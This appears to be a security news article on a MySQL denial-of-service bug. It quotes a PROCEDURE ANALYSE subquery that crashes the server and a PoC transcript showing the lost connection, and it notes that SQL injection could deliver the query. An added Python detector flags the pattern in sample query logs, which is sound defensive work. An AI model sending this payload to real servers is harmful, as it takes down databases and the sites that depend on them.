A new MySQL zero-day has been discovered by Osanda Malith, a security researcher and reverse engineer.
This zero-day allows an attacker to perform a denial of service (DoS) attack against any server running MySQL versions 5.5.45 and above. The bug lies in the PROCEDURE ANALYSE() function: the server crashes when it is passed this subquery:
SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);
Here's a proof of concept (PoC) provided by Osanda:
---------------------------------------------------------------------------------------------------------------
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR: Can't connect to the server
mysql>
---------------------------------------------------------------------------------------------------------------
After the query is executed, MySQL becomes unresponsive and the site stops working. Obviously, access to the SQL database is needed, but that access can be obtained if the site is vulnerable to SQL injection.
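Because the crash is triggered by a recognisable statement shape (a subquery as the first argument of PROCEDURE ANALYSE), defenders can hunt for it in the MySQL general query log. The following detector is an added example, not part of the article or Osanda's PoC; the log lines are constructed samples in the 5.7-style general-log layout (timestamp, thread id, command, argument), and the regex is my own heuristic.

```python
import re
from typing import List, Tuple

# Constructed sample of MySQL general-log lines (not real log data): the
# crash-triggering PROCEDURE ANALYSE pattern quoted in the article, plus
# benign queries that must not be flagged.
SAMPLE_GENERAL_LOG = (
    "2016-07-14T10:01:02.000000Z\t   12 Query\tSELECT * FROM users WHERE id = 7\n"
    "2016-07-14T10:01:03.000000Z\t   12 Query\tselect * from information_schema.tables "
    "procedure analyse((select*from(select 1)x),1)\n"
    "2016-07-14T10:01:04.000000Z\t   13 Query\tSELECT col1 FROM t PROCEDURE ANALYSE(10, 256)\n"
    "2016-07-14T10:01:05.000000Z\t   14 Query\tSELECT * FROM `t`  PROCEDURE  ANALYSE ( ( SELECT 1 ) , 1 )\n"
    "2016-07-14T10:01:06.000000Z\t   14 Quit\t\n"
)

# PROCEDURE ANALYSE whose first argument is a parenthesised subquery instead of
# the numeric limits the function normally takes. Case-insensitive and
# whitespace-tolerant so "analyse((select*from" and "ANALYSE ( ( SELECT" both hit.
_ANALYSE_SUBQUERY = re.compile(r"\bPROCEDURE\s+ANALYSE\s*\(\s*\(\s*SELECT\b", re.IGNORECASE)

# One general-log line: "<timestamp>\t<thread_id> <command>\t<argument>"
_LOG_LINE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<thread>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")


def parse_general_log(text: str) -> List[Tuple[str, int, str, str]]:
    """Return (timestamp, thread_id, command, argument) for each well-formed line."""
    entries = []
    for line in text.splitlines():
        m = _LOG_LINE.match(line)
        if m:
            entries.append((m["ts"], int(m["thread"]), m["cmd"], m["arg"]))
    return entries


def is_analyse_subquery(statement: str) -> bool:
    """True if the statement passes a subquery as the first PROCEDURE ANALYSE argument."""
    return _ANALYSE_SUBQUERY.search(statement) is not None


def find_suspicious_queries(text: str) -> List[Tuple[int, str]]:
    """Scan a general log and return (thread_id, statement) for every matching Query."""
    return [(thread, arg) for _ts, thread, cmd, arg in parse_general_log(text)
            if cmd == "Query" and is_analyse_subquery(arg)]


if __name__ == "__main__":
    for thread, stmt in find_suspicious_queries(SAMPLE_GENERAL_LOG):
        print(f"thread {thread}: {stmt}")
```

The same predicate can sit in an application-side query filter or WAF rule; the general log is the cheapest place to confirm whether the pattern ever reached a server that has not yet been patched.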
Video PoC:
For a more in-depth analysis, visit Osanda's blog, here.
Download his PoC script, written in Python, here.